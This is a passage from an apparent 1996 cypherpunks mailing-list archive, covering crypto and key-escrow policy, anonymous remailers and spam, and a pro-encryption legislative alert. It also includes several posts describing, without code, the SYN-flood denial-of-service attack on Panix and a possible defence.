cost of having 10% of the male black population in lockdown. no, my bottome line is the Bubba has sunk to bottom with paranoia, both he and the elite money interests which jerk all of the politicial habituites who depend on their soft money for their campaings and who wish to participate at the trough of influence and greed (ever see someone retired after many years in Washington without a bundle). --attila -- one of the few things we all share: the utter, corrosive contempt for our elected officials. From liberty at gate.net Thu Sep 12 12:39:02 1996 From: liberty at gate.net (Jim Ray) Date: Fri, 13 Sep 1996 03:39:02 +0800 Subject: Getting the word "GAK" into common usage Message-ID: <199609121522.LAA106562@osceola.gate.net> -----BEGIN PGP SIGNED MESSAGE----- Mime-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 7bit To: cypherpunks at toad.com Date: Thu Sep 12 11:20:55 1996 cypherpunks: As most of you know, I have been trying to bring "our" word, "GAK" into common usage, as opposed to the "key-escrow" Newspeak proposed by some (unnamed) big-government bureaucrat, and unfortunately adopted in most discussions of cryptography policy, (especially those outside this forum) in spite of the true English meaning of the word "escrow." There is a resource called "Infomania," which you can learn about by sending a blank message with the subject "help" to . The service provides, via email, services that are normally only available to people who have real internet acess (ie, "WHOIS,") but there is also a heavy bias toward humor. Sending it the subject "GEEK," for example, returns the current version of the Code of the Geeks. Sending the subject CHEF with some dry, boring text (such as this message) in the message body returns you a truly hilarious transmogrification. :) Anyway, I have been in contact with Jason Fesler, who administers the site for Infomania [a firm which produces film separations for commercial grade printers and which provides this free service] about putting in a new command, "GAK," which will return to senders whatever the current U.S. govt. "key-escrow" Newspeak bigbrother anti-privacy proposal(s) is/are. (ie. clipper1, clipper2, son of clipper etc.). He has agreed that if we can supply a script or url or gopher page or something of that sort to interface it to, and a person to maintain it whenever the policy changes yet again (the hard part) he will do it. I would, of course, expect a bit of cypherpunkly commentary to accompany the text. Perhaps this information already exists (likely it does) on some page, and if you know where and think it is stable and well-updated, please email me privately, and I will try to put the owner of the site in touch with Jason. I am Bccing him with this message. Thanks for your help. JMR Regards, Jim Ray -- DNRC Minister of Encryption Advocacy "As govt.s grow arithmetically, corruption grows exponentially." -- Ray's Law of official corruption. Defeat the Duopoly! Stop the Browne out. Harry Browne for President. Jo Jorgensen for Vice-president. http://www.HarryBrowne96.org/ http://www.twr.com/stbo ___________________________________________________________________ PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8 I will generate a new (and bigger) PGP key-pair on election night. http://www.shopmiami.com/prs/jimray ___________________________________________________________________ -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMjgqXW1lp8bpvW01AQF49wP8Ci8D9blF898dNaFsKesX311qT2MO88zr xM11xZ0g1Ui4ahv3yB4jo6qqv4Z9InjNpiOk6wxcsXUPPtn6UNCBOTdos/DCk/SO SSOupiLA48gBHfoCIMN2f/+hGGM4BcuYC5wQ9rgJrTeiY8nQX18hJxKDxujn7z0A pbvTrSRQozY= =rA5a -----END PGP SIGNATURE----- From ac at twinds.com Thu Sep 12 12:39:45 1996 From: ac at twinds.com (Arley Carter) Date: Fri, 13 Sep 1996 03:39:45 +0800 Subject: TWA 800 - hit by an unarmed US missile? In-Reply-To: Message-ID: On Mon, 9 Sep 1996, Vince wrote: > > > > Is the press on top of this? > > -- Vince > > When did the press acquire the role of defender of truth, justice, honesty or integrity? Cheers: -arc Arley Carter Tradewinds Technologies, Inc. email: ac at twinds.com www: http://www.twinds.com "Life is a journey to adventure and discovery, not a problem to be solved." -me From thevillage at void.gov Thu Sep 12 12:48:41 1996 From: thevillage at void.gov (#6) Date: Fri, 13 Sep 1996 03:48:41 +0800 Subject: PANIX.COM down: denial of service attack Message-ID: <323835AE.6EA6@void.gov> WSJ 9/12/96 Paraphrasing: Panix has been under attack for the last week by someone flooding their server with bogus "requests for information" [see below] ... The attack(s): * "Have rendered almost defenseless the small NY company" * "...began late Friday afternoon ... were still continung yesterday" * have targeted "computers that control WWW pages, store e-mail, and still others that link Internet addresses to Panix subscribers." "The hacker [sic] has been sending up to 150 requests a second to Panix's computers, seeking to establish a connection ... the requests, presumably generated by a malicious computer program, contain fake Internet addresses, which the computer must sort out before they can discard them. The computers have choked under the deluge." "As to who might be targeting Panix, the firm's Mr. Rosen speculated it could be someone upset by the fact that the site hosts, free, the Web site for Voters Telecommunication Watch...." From varange at crl.com Thu Sep 12 13:08:34 1996 From: varange at crl.com (Troy Varange) Date: Fri, 13 Sep 1996 04:08:34 +0800 Subject: Bubba Bottoming out on Cocaine Paranoia? In-Reply-To: <199609121502.JAA19550@InfoWest.COM> Message-ID: <199609121637.AA08784@crl11.crl.com> Are you familiar with the Jefferson Bible? It's an excerpt and rearrangement of the gospels to produce a more liberal effect. It shows that Thomas Jefferson was into interpretation rather than doctrinaire discipline. And rather than "dispensing drugs in clinics," why not simply scrap the drug laws entirely? People have a *right* to do as they please with their bodies. From nobody at cypherpunks.ca Thu Sep 12 13:50:06 1996 From: nobody at cypherpunks.ca (John Anonymous MacDonald) Date: Fri, 13 Sep 1996 04:50:06 +0800 Subject: Child Porn as Thoughtcrime Message-ID: <199609121707.KAA12179@abraham.cs.berkeley.edu> Rick Smith wrote: > : ...the "little girls in leotards" case was only a few years ago, etc.) > > Don't know about that one. Is it illegal for little girls to be > photographed in leotards now? "Nutcracker" is X rated? Move over, > Bambi. But this proves precisely Tim's original point, that child pornography is a thoughtcrime. Here's a working definition of child pornography at the end of the millenium: it's a picture of a child, in the hands of a pedophile. Pictures of girls in leotarfds are not child pornography per se, but if you think evil thoughts while watching them, then they become child pornography. What got Stephen Knox in trouble was leaving so much evidence that he was thinking those evil thoughts. From jya at pipeline.com Thu Sep 12 13:50:07 1996 From: jya at pipeline.com (John Young) Date: Fri, 13 Sep 1996 04:50:07 +0800 Subject: XPA_nix Message-ID: <199609121743.RAA13735@pipe3.t1.usa.pipeline.com> WSJ and WaPo have reports on Panix-jamming by info-request bombardment, and Bell Labs security expert Bill Cheswick's attempt to solve it. Cheswick opines,"This is the first major attack of a kind that I believe to be the final Internet security problem." ----- http://jya.com/xpanix.txt XPA_nix From admin at superhot.com Thu Sep 12 13:52:12 1996 From: admin at superhot.com (Admin) Date: Fri, 13 Sep 1996 04:52:12 +0800 Subject: Nonsense, absolute nonsense... [Fwd: HipCrime and Spam] Message-ID: <199609121640.KAA19040@rintintin.Colorado.EDU> At 09:34 PM 9/11/96 -0400, you wrote: >-----BEGIN PGP SIGNED MESSAGE----- > >On Wed, 11 Sep 1996, Admin wrote: > >> >This is an absurd and inaccurate analogy. The mailBot simply pushes >> >*mailto:* tags that people have willingly placed on their public websites. >> >They invite the mail so a more accurate analogy would be that City Hall puts >> >up a public suggestion box and invites comments. The bot then puts one, and >> >only one, unsigned anonymous suggestion into the box. It then goes on to the > >You're sending out messages, inviting people to visit your web site, but >you're using anonymous remailers because... you don't want people to know >who you are? Perhaps he's sending out through the remailers...because he can. Its open to the public. Or perhaps he's trying to get the word out about remailers also, or perhaps no one but he knows why, and why is unimportant. You can always make your remailers a private, pay per use club. Then you could control all the *whys* *whens* and *hows*. >Then why invite them to your site (or even have a site)? It's >like if I sent out postcards to people with no return address saying, >"Please stop by 1313 Mockingbird Lane for snacks and refreshments. Signed, >A Friend". (Note, this is not my real address.) >Only in this case the >postcards don't have any stamps so the people who receive them have to pay >the postage. Which is precisely what you're doing: Sending someone e-mail >costs them time and it often costs them money. These people have invited the email, and the associated expense, by placing a public email-to: button on their public www page. A more acurate analogy, and to the point, would be if a business sends you a postage pre-paid business reply card, that is blank, and invites your comments on the card. They can hardly complain of the expense when people actually send it in, even if they don't like the comments. >Sending it through an >anonymous remailer accomplishes four things: 1) People can't complain to >you to stop sending them mail. Seems anyone who followed the link can complain to the appropriate source. >2) It costs us, the International Secret >Cabal of Anonymous Remailer Operators, time and money for no good reason, >because you are sending anonymous mail and not making yourself anonymous. Didn't see any disclaimers on the remailers requiring a *good reason* to use them. Who would be this Judge of Sufficiently Good Reason? Perhaps you can write an AI piece that can auto-detect good reason from *no good reason*... >3) You're pissing off a bunch of people, and the only ones they can take >their frustrations out on or complain to is us. What is the ratio of *pissed off people* to not pissed off people. Likely less than 0.5% based on how many messages the Cpunks claim went out in a day. >4) It's giving us a bad >rap, man, and that's the *last* thing the remailer net needs now. The saying goes...There is Heat in the Kitchen... > >I could care less about your little applet, or what you have to say; in >the words of Thomas Jefferson, "it neither breaks my leg nor picks my >pocket." Until, that is, you start sending it through my remailer, and >*then* you start picking my pocket. >The remailers of the world don't exist >to provide non-anonymous anonymous advertising, which you could do just as >well on your own sending forged e-mail headers from netcom. Now now... forgery is a no-no. And someone always has the freedom to give up their anonymity whenever they choose. > >Andy Dustman / Computational Center for Molecular Structure and Design / UGA >===== For PGP public key: finger andy at neptune.chem.uga.edu | pgp -fka ===== >Sure, the Telecomm Act will create jobs: 100,000 new thought-cops on the net >http://charon.chem.uga.edu/~andy mailto:andy at CCMSD.chem.uga.edu <}+++< <>________________Lowest_Priced_Long_Distance__________________<> ||Long Distance 9.9�/min |Helping hardworking people || ||9.9� Anytime, Anywhere in US! |like yourself pay the || ||Free sign-up, 6 second billing |lowest possible price for || ||http://www.superhot.com/phone |high quality LD service. || <>-----------------------1_303_692_5190------------------------<> From frissell at panix.com Thu Sep 12 14:00:18 1996 From: frissell at panix.com (Duncan Frissell) Date: Fri, 13 Sep 1996 05:00:18 +0800 Subject: PANIX.COM down: denial of service attack Message-ID: <2.2.32.19960912175446.008bf064@panix.com> At 09:09 AM 9/12/96 -0700, #6 wrote: >WSJ 9/12/96 > >Paraphrasing: > >Panix has been under attack for the last week by someone flooding >their server with bogus "requests for information" [see below] ... Even though service has suffered, Panix is still useable. Until I read the MOTDs on Tuesday, I thought it was just normal flakiness. DCF From declan at well.com Thu Sep 12 14:02:58 1996 From: declan at well.com (Declan McCullagh) Date: Fri, 13 Sep 1996 05:02:58 +0800 Subject: Fear of Flying -- from HotWired Message-ID: http://www.hotwired.com/netizen/96/37/special3a.html 12 September 96 HotWired, The Netizen Fear of Flying by Declan McCullagh (declan at well.com) Washington, DC, 11 September John Gilmore, co-founder of the Electronic Frontier Foundation, knows firsthand how drastically airports in the United States are altering their policies in response to the nation's perceived vulnerability to terrorists. When Gilmore opened his laptop for inspection by airport personnel at San Francisco International last month - as requested - but refused to turn the machine on, the cops were called. When he then refused to show identification to airport police, "they put the handcuffs on me and hauled me off," he told The Netizen. The cops took Gilmore to a back-room office. "They tried to ask me questions. I said I wanted to speak to my lawyer. They kept asking me questions anyway," he says. Airport police arrested Gilmore even though, according to the FAA, "there is currently no prohibition against allowing someone on an aircraft" without identification. Gilmore's arrest came after President Clinton tightened airport security in response to the TWA Flight 800 disaster and the Atlanta Olympic Games bombing. Now the anti-terrorism drumbeat in the nation's capital is starting again, and it's louder and more ominous than ever. It reached a fevered pitch Monday, when Clinton called for an increase of more than one billion dollars to be spent on anti-terrorism measures, especially airport security. Clinton based his request on the unsurprising recommendations of a commission created by executive order in August, staffed by spooks and headed by Vice President Gore. The group's proposal includes a plan allowing the CIA and FBI to "develop a system" to screen passengers who fit certain profiles as potential terrorists. David Sobel, a lawyer with the Electronic Privacy Information Center, called the White House proposal "a realization of Big Brother concerns people have about computer technology." The proposal would allow the FBI and CIA to couple their databases with those of the airlines. "There are going to be massive databases that will track our actions and activities. If you think of increased capabilities to collect information, it's even scarier," Sobel said. A former US senator agrees. At a Cato Institute terrorism conference yesterday, Malcolm Wallop said: "In the year and a half since the terrorism debate began, all the legislation considered would do little or nothing to stop or deter terrorism. These measures do more to crack down on Americans than terrorists. "A bloody nose does not warrant an exponential expansion of federal government authority," argued Wallop, now the chairman of the Frontiers of Freedom Institute. Over lunch at the conference yesterday afternoon, former CIA director James Woolsey responded with some seemingly gratuitous anti-Net rhetoric. Terrorists may use biological weapons like anthrax, he said. "Anthrax is colorless, odorless, and has a 90 percent lethality. One gram has 100 million lethal doses." Then Woolsey delivered the zinger: "The knowledge of how to make anthrax is widely available, including on the Internet." Not content to let bad enough alone, Woolsey added that the government can't allow netizens to use data-scrambling software like Pretty Good Privacy that the spooks can't break. He said the threat of terrorism will "require us to have a key escrow system" where keys "for complex algorithms [will] be placed in such a way that the government" will have access to them. "You can accommodate industry a lot, but the principle is: you got to get to the key," Woolsey said. (FBI director Louis Freeh made similar, though less straightforward, comments during Senate hearings in July.) Before Congress adjourns for the fall recess, the House must decide whether to approve a "digital telephony" domestic wiretapping slush fund into which the NSA and CIA can pour cash. Senators will then likely add provisions for warrantless wiretaps to the anti-terrorism bill that the House sent to them in August. The fundamental problem here is, of course, the politics of terrorism. Legislators routinely grandstand atop national tragedies, using victims and their families as backdrops. Justice Department lobbyists then swarm onto Capitol Hill and demand reduced civil liberties in the name of fighting terrorism. Societies can, and should, safeguard against systematic threats. Random acts of violence, on the other hand, are trickier to forestall - and terrorist acts are anything but predictable. Luckily for the EFF's Gilmore, he was cited only for the crime of "delaying/obstructing a peace officer" and was released after being handcuffed to a bench and then dumped in a holding cell for a few hours. He got off easy. But if Congress decides to sacrifice freedom for security, the country will ultimately enjoy neither. ### From smith at sctc.com Thu Sep 12 14:36:12 1996 From: smith at sctc.com (Rick Smith) Date: Fri, 13 Sep 1996 05:36:12 +0800 Subject: (Correction) Child Porn as Thoughtcrime Message-ID: <199609121758.MAA27427@shade.sctc.com> I wrote: : I've read in several places that the Jock Sturges case was thrown out : Nobody has dragged me away in shackles for : owning "Radiant Images." Correction -- That's "Radiant Identities." Rick. From frissell at panix.com Thu Sep 12 14:55:20 1996 From: frissell at panix.com (Duncan Frissell) Date: Fri, 13 Sep 1996 05:55:20 +0800 Subject: PANIX.COM down: denial of service attack Message-ID: <2.2.32.19960912182630.008b6324@panix.com> Here are the gory details from the first MOTD last Saturday: The attacker is forging random source addresses on his packets, so there is no way to find his/her location. There is also no way to screen out those packets with a simple router filter. This is probably the most deadly type of denial-of-service attack possible. There is no easy or quick way of dealing with it. If it continues into Saturday we will start working on kernel modifications to try to absorb the damage (since there's absolutely no way to avoid it). This however will not be an easy job and it could take days to get done (and get done right). For those who are IP hackers, the problem is that we're being flooded with SYNs from random IP addresses on our smtp ports. We are getting on average 150 packets per second (50 per host). We are not the only site being attacked in this way. I know of one other site that is being attacked in an identical manner right now, and I know of three others that have been attacked in the last two weeks. I hope that this means that the attacker is merely playing malicious games, and will soon tire of molesting our site. If that is the case, mail will come back up as soon as the attack ends. But if the attacker is really interested in damaging Panix specifically, the attack may *never* stop and service won't be restored until we can write kernel modifications. Since then the packet streams have hit almost all the ports for news, www, telnet, etc. DCF From talon57 at well.com Thu Sep 12 14:55:55 1996 From: talon57 at well.com (Brian D Williams) Date: Fri, 13 Sep 1996 05:55:55 +0800 Subject: [BOOK] "Competitive Intelligence" corrected Message-ID: <199609121612.JAA25760@well.com> Sorry, forgot the Author... Brian "Car Bombs- The poor mans cruise missle." Competitive Intelligence Larry Kahaner "From Black Ops to Boardrooms- How Businesses Gather, Analyze, and use Information to Succeed in the Global Marketplace." ISBN 0-684-81074-3 Simon and Schuster ($24.00) Preface: Being a Hero and not a Bum Part One: What is Competitive Intelligence? 1.) The Rise of Competitive Intelligence 2.) What Competitive Intelligence can do for your company: Information vs Intelligence 3.) Why most managers are still stuck in the information age Part Two: Real-World Competitive Intelligence 4.) The Intelligence Cycle 5.) Planning and Direction 6.) Collection 7.) Analysis 8.) Dissemination 9.) Mergers and Acquistions 10.) Benchmarking and Competitive Intelligence 11.) How the Japanese Perform Competitive Intelligence 12.) Competitive Intelligence in other Countries 13.) Building a Competitive Intelligence System Part Three: Issues, Opportunities, and the Future 14.) Justifying the cost of Competitive Intelligence 15.) Using Competitive Intelligence in the European Union 16.) Ethics 17.) The New Gatekeepers 18.) Why the U.S. Government must get involved in Competitive Intelligence 19.) Competitive Intelligence-The Next Generation Glossary of Competitive Intelligence From paul at fatmans.demon.co.uk Thu Sep 12 15:07:52 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Fri, 13 Sep 1996 06:07:52 +0800 Subject: ... subversive leftists Message-ID: <842550019.23167.0@fatmans.demon.co.uk> > tcmay at got.net (Timothy C. May) writes: > > As to "tasteless and insulting," a matter of personal perspective. I find > > it helpful to call a spade a spade, and others apparently do as well. > > > > Of course, Tim gets very uncomfortable when others call a spade a spade. This constant character assasination of Tim is getting rather boring, as far as I can see, and I read all of the posts on the list, he has done nothing more than ignore posts from these idiots, that is his choice and nothing to do with anyone else. This whole thread is taking up too much space and is just totally pointless. lets call it a day and just agree to differ eh? Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey" -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6 mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53 6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3 sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az4= =riHc -----END PGP PUBLIC KEY BLOCK----- From frantz at netcom.com Thu Sep 12 15:14:08 1996 From: frantz at netcom.com (Bill Frantz) Date: Fri, 13 Sep 1996 06:14:08 +0800 Subject: Fear of Flying -- from HotWired Message-ID: <199609121900.MAA03286@netcom8.netcom.com> At 1:16 PM 9/12/96 -0500, Declan McCullagh quoted: >... former CIA director James Woolsey: responded with some seemingly > gratuitous anti-Net > rhetoric. Terrorists may use biological weapons like anthrax, he said. > "Anthrax is colorless, odorless, and has a 90 percent lethality. One > gram has 100 million lethal doses." Then Woolsey delivered the zinger: > "The knowledge of how to make anthrax is widely available, including > on the Internet." Gee, biotech has come a long way. Now I can download the Anthrax DNA sequence from the net and insert it in some carrier bacteria and start making Anthrax bacteria. Neat! Or did he mean I can chemically synthesize Anthrax toxin? Or did he mean I can get information on culturing bacteria on the net, but must obtain a sample of the bacteria from other sources? BTW - My dictionary says that Anthrax is primarily an animal disease which only occasionally infects humans. It sounds like a poor choice for bio-war terror. ------------------------------------------------------------------------- Bill Frantz | "Lone Star" - My personal | Periwinkle -- Consulting (408)356-8506 | choice for best movie of | 16345 Englewood Ave. frantz at netcom.com | 1996 | Los Gatos, CA 95032, USA From EALLENSMITH at ocelot.Rutgers.EDU Thu Sep 12 15:22:15 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Fri, 13 Sep 1996 06:22:15 +0800 Subject: Excite Live! Message-ID: <01I9EA0TKKDS9ULOQC@mbcl.rutgers.edu> From: IN%"live at excite.com" 11-SEP-1996 22:14:03.06 >A request was made for the location of your Excite Live! page >Found your Excite Live at URL >http://live.excite.com/?uid=CEC8C99632372D6E Hi. As you can see from the above, I've set up an Excite Live! page up with the email address of cypherpunks at toad.com. It has top priority on things related to cypherpunks, including technology news, political news, international news, etcetera, plus some build-in links and searches to appropriate places. I'd advise using the anonymizer to access the above link (http://www.anonymizer.com:8080/http://live.excite.com/?uid=). -Allen From ses at tipper.oit.unc.edu Thu Sep 12 15:24:31 1996 From: ses at tipper.oit.unc.edu (Simon Spero) Date: Fri, 13 Sep 1996 06:24:31 +0800 Subject: Panix attack In-Reply-To: <199609121743.RAA13735@pipe3.t1.usa.pipeline.com> Message-ID: On Thu, 12 Sep 1996, John Young wrote: > WSJ and WaPo have reports on Panix-jamming by info-request bombardment, and > Bell Labs security expert Bill Cheswick's attempt to solve it. This particular attack has been known for some time; kind of suprising it hasn't been used before. It is defensible, but it can take a lot of memory to give full protection. The best way IPV4 way I know of to stop the listen queue being filled is to use a special structure to hold half-open incoming connections, and not allocate the full TCB until the ack of the syn-ack comes in; that way, the listen queue can be made large enough to keep enouygh connections to cover the number of SYNS recievable before the half-open connection times out This ensures that there's at least a traceable return address for the connection. Sort of like photuris cookies but without the forced RTT delay (The timeout was added to most stacks in 94 after backbone fuckups caused queues to wedge on most of the big web servers with all sorts of asymetric routing problems. It's not strictly legal TCP) ---- Cause maybe (maybe) | In my mind I'm going to Carolina you're gonna be the one that saves me | - back in Chapel Hill May 16th. And after all | Email address remains unchanged You're my firewall - | ........First in Usenet......... From shabbir at vtw.org Thu Sep 12 15:48:08 1996 From: shabbir at vtw.org (Voters Telecommunications Watch) Date: Fri, 13 Sep 1996 06:48:08 +0800 Subject: ALERT: S.1726 vote postponed; keep calling! Offices are swamped! (9/11/96) Message-ID: <199609121839.OAA09646@panix3.panix.com> ======================================================================== SENATE COMMERCE COMMITTEE VOTE POSTPONED SENATOR BURNS ENCLOSES LETTER OF COMMITTMENT TO CRYPTO WE CONTINUE TO RECEIVE REPORTS OF "HEAVY CALLS" TO OFFICES. KEEP THE PRESSURE UP! WE'RE HOLDING OUR OWN! September 12, 1996 Please widely redistribute this document with this banner intact until September 30, 1996 ________________________________________________________________________ CONTENTS The Latest News What You Can Do Now Background / What To Expect This Week Description of S.1726, Pro-CODE Bill Chronology of Pro-Crypto Legislation For More Information / Supporting Organizations ________________________________________________________________________ THE LATEST NEWS The Senate Commerce Committee vote on S.1726 (Pro-CODE) originally set for today (Thursday 9/12) has been postponed. We have been told that the change was largely due to committee scheduling issues, and the Committee staff and have indicated that they are still committeed to marking up S. 1726 within the next. More information should be available shortly. Senator Conrad Burns (R-MT), co-author of S. 1726, asked us to forward the following note to the net.community: X-POP3-Rcpt: jseiger at mailserver From: Conrad_Burns at burns.senate.gov Date: Thu, 12 Sep 96 09:55:35 EST To: jseiger at cdt.org Subject: Open Letter to the Internet from Senator Burns The Commerce Committee markup on Pro-CODE, S. 1726, that we had expected to have held on Thursday, September 12 has been postponed. I am fully committed to taking Pro-CODE to markup, out of committee and onto the floor of the Senate in this Congress. I believe that this legislation is vital to ensuring the continued strength of America's high-tech community and the privacy of its citizens. I would like to thank the many thousands of Netizens who have expressed their support for Pro-CODE. Sincerely, U.S. Senator Conrad Burns It is critical to keep your phone calls and faxes coming into the offices of the Committee members listed below. Based on the feedback we are receiving from callers and conversations with Capitol Hill staff, the response from the Net has been strong and continuous. Thank you to all who have taken the time to call Congress to voice your support for encryption policy reform. If you have not yet done so, please take a moment to call the committee members below. If you have a little extra time on your hands, between now and the middle of next week please make an effort to call all the Senators on the list below. Your help and support is critical to the future of privacy and security on the Internet. Finally, please don't forget to sign the petition in support of Encryption Policy Reform -- http://www.crypto.com/petition/. More than 4000 Netizens have already signed, including encryption experts Phil Zimmermann, Matt Blaze, Phil Karn, and others. ________________________________________________________________________ WHAT YOU CAN DO NOW It's crucial that you call the Commerce committee members below and urge them to pass S.1726 out of committee without amendments. (This is also known as a "clean" bill.) Any opportunity for amendments (even if they are good) opens us up to the possibility of hostile amendments that could restrict the use of encryption even further than today's abysmal state. It could even prohibit the use of encryption without Clipper Chip-like key 'escrow' technology, which includes built-in surveillance and monitoring functionality. 1. Call/Fax the members of the Senate Commerce committee and urge them to pass S.1726 out of committee "cleanly". Do not use email, as it is not likely to be looked at in time to make a difference. Use the sample communique and directory listing below to make it a simple TWO MINUTE task. 2. Sign the petition to support strong encryption at http://www.crypto.com/petition/ ! Join other cyber-heroes as Phil Zimmermann, Matt Blaze, Bruce Schneier, Vince Cate, Phil Karn, and others who have also signed. 3. Over the next 7 days, it is crucial that you call all these members of the Senate Commerce Committee. P ST Name and Address Phone Fax = == ======================== ============== ============== D SC Hollings, Ernest F. 1-202-224-6121 1-202-224-4293 D MA Kerry, John F. 1-202-224-2742 1-202-224-8525 D HI Inouye, Daniel K. 1-202-224-3934 1-202-224-6747 D KY Ford, Wendell H. 1-202-224-4343 1-202-224-0046 D WV Rockefeller, John D. 1-202-224-6472 1-202-224-7665 D LA Breaux, John B. 1-202-224-4623 1-202-228-2577 D NV Bryan, Richard H. 1-202-224-6244 1-202-224-1867 D ND Dorgan, Byron L. 1-202-224-2551 1-202-224-1193 D NE Exon, J. J. 1-202-224-4224 1-202-224-5213 D OR Wyden, Ron* 1-202-224-5244 1-202-228-2717 R SD Pressler, Larry* 1-202-224-5842 1-202-224-1259 R MT Burns, Conrad R.(*sponsor) 1-202-224-2644 1-202-224-8594 R AK Stevens, Ted 1-202-224-3004 1-202-224-2354 R AZ McCain, John* 1-202-224-2235 1-202-228-2862 R WA Gorton, Slade 1-202-224-3441 1-202-224-9393 R MS Lott, Trent* 1-202-224-6253 1-202-224-2262 R TX Hutchison, Kay Bailey 1-202-224-5922 1-202-224-0776 R ME Snowe, Olympia 1-202-224-5344 1-202-224-1946 R MO Ashcroft, John* 1-202-224-6154 1-202-228-0998 R TN Frist, Bill 1-202-224-3344 1-202-228-1264 R MI Abraham, Spencer 1-202-224-4822 1-202-224-8834 * supporter or cosponsor. The bill also enjoys broad bi-partisan support from members not on the committee including Senators Leahy (D-VT) and Murray (D-WA). 4. Here is a sample conversation: SAMPLE PHONE CALL You: Sen:Hello, Senator Mojo's office! You: SAY I'm calling to urge the Senator to pass S.1726, the Burns, Leahy, THIS-> Pressler bill at the upcoming Commerce Committee Markup. The bill is critical to the future of privacy, security, and electronic commerce on the internet. Sen:Ok, thanks! IF THEY SAY "The Senator has concerns about the bill", please answer, "Please try to work these issues out as it moves to the Senate floor, but passage out of committee will send an important signal to the Administration." 5. To help us measure the effectiveness of the campaign, WE NEED TO HEAR FROM YOU. Please tell us who you called, and how they sounded. We'll be passing this information to folks in D.C. who can help apply pressure where needed. $ Mail vtw at vtw.org Subject: I called so-and-so Hey, I called Sen. Mojo. He sounded iffy, call in the reinforcements. ^D 6. Forward this to your friends and colleagues in appropriate forums until the date of expiration at the top. Forward a copy of this to your Internet Service Provider as well, and ask them to put the following text in their message of the day (motd), or on their WWW page: ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT The U.S. Senate will be voting on a proposal to encourage better security on the Internet soon. Your help is needed to call Congress. See http://www.crypto.com/ for more details. ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ________________________________________________________________________ BACKGROUND / WHAT TO EXPECT THIS WEEK For the past 3 years, Cyber-Rights Activists, citizens, and industry leaders have been working hard to reform US encryption policy. Support has been building behind several legislative proposals this year because they send a clear signal to the Administration about the need for security and privacy in the Information Age. The digital revolution is currently being held hostage by the White House's Cold War restrictions on privacy-enhancing encryption technology. Now, with Congress less than a month away from adjournment, everyone who supports encryption and privacy is working to see this bill leave committee in order to send a clear message to the White House that they are on the wrong side of the encryption issue. Although this bill may not become law this year, its passage out of committee will be a landmark event that will clearly tell the White House that the Congress, the public, and the computer industry care about security and privacy, and need strong, reliable encryption technology in order to make the Internet a viable platform for commerce, education, and democracy. Success for our side is not certain, and the next week is not without risks. On September 12th (or sometime soon after), the Senate Commerce committee is expected to hold a "markup", where the bill is examined, voted on, and if there are enough votes, passed out of committee. Two things could happen: -the committee could pass the bill as written, -the committee could pass the bill with amendments. Any amendments are not likely to be friendly, and in particular, quiet sources have told privacy activists that the Clinton Administration has been readying a legislative assault on your right to use encryption for several weeks now. A Clipper-like amendment could be attached to the bill if our side does not have enough votes to block all amendments. It is crucial that all netizens who consider privacy and security important take a moment to call members of the Commerce Committee right now and urge them to vote S.1726 out of committee without amendments. ________________________________________________________________________ DESCRIPTION OF S.1726, PRO-CODE BILL Privacy-enhancing encryption technology is currently under heavy restrictions kept in place by the White House. Encryption that is currently allowed to be exported is not sufficient to protect confidential information. This policy acquires an "Alice-in-Wonderland" quality when one realizes that strong encryption products are available abroad both for sale and for free download off the Internet. The Pro-CODE Act resolves to: 1. Allow for the *unrestricted* export of "mass-market" or "public-domain" encryption programs, including such products as Pretty Good Privacy and popular World Wide Web browsers. 2. Requires the Secretary of Commerce to allow the less restricted export of other encryption technologies if products of similar strength are generally available outside the United States, roughly up to DES strength. 3. Prohibits the federal government from imposing mandatory key-escrow encryption policies on the domestic market and limiting the authority of the Secretary of Commerce to set standards for encryption products. ________________________________________________________________________ CHRONOLOGY OF PRO-CRYPTO LEGISLATION 9/12/96 (scheduled) Senate Commerce committee will hold markup of S.1726 and hopefully pass it out of committee with no amendments. 7/25/96: Full Senate Commerce committee holds positive hearings on S.1726. FBI Director Louis Freeh testifies along with many cyber-luminaries. Hearings are cybercast Internet Cyber-Rights activists with HotWired and WWW.Crypto.Com. You can see the photos, read the testimony, and listen to the audio transcript at http://www.crypto.com/events/072596/ 6/26/96: Senate subcommittee holds positive hearings on S.1726. Hearings are cybercast Internet Cyber-Rights activists with HotWired and WWW.Crypto.Com. You can see the photos, read the testimony, and listen to the audio transcript at http://www.crypto.com/events/062696/ 5/2/96: Bi-partisan group of Senators introduce Pro-CODE Act, which would free public-domain encryption software (such as PGP) for export, free much commercial encryption for export, and reduce the government's ability to push Clipper proposals down the throats of an unwilling public. Original sponsors include: Senators Burns (R-MT), Dole (R-KS), Faircloth (R-NC), Leahy (D-VT), Murray (D-WA), Pressler (R-SD), and Wyden (D-OR). 3/5/96: Sen. Leahy (D-VT) and Rep. Goodlatte (R-VA) announce encryption bills (S.1587/H.R.3011) that significantly relax export restrictions on products with encryption functionality in them, as well as free public domain software such as PGP (Pretty Good Privacy). ________________________________________________________________________ FOR MORE INFORMATION / SUPPORTING ORGANIZATIONS There are many excellent resources online to get up to speed on crypto including the following WWW sites: http://www.crypto.com http://www.privacy.org http://www.eff.org http://www.cdt.org http://www.epic.org http://www.vtw.org Please visit them often. The following organizations have signed onto this alert: American Civil Liberties Union Center for Democracy and Technology Electronic Frontier Foundation Electronic Privacy Information Center Voters Telecommunications Watch ________________________________________________________________________ End alert ======================================================================== From robert at precipice.v-site.net Thu Sep 12 15:58:09 1996 From: robert at precipice.v-site.net (HipCrime) Date: Fri, 13 Sep 1996 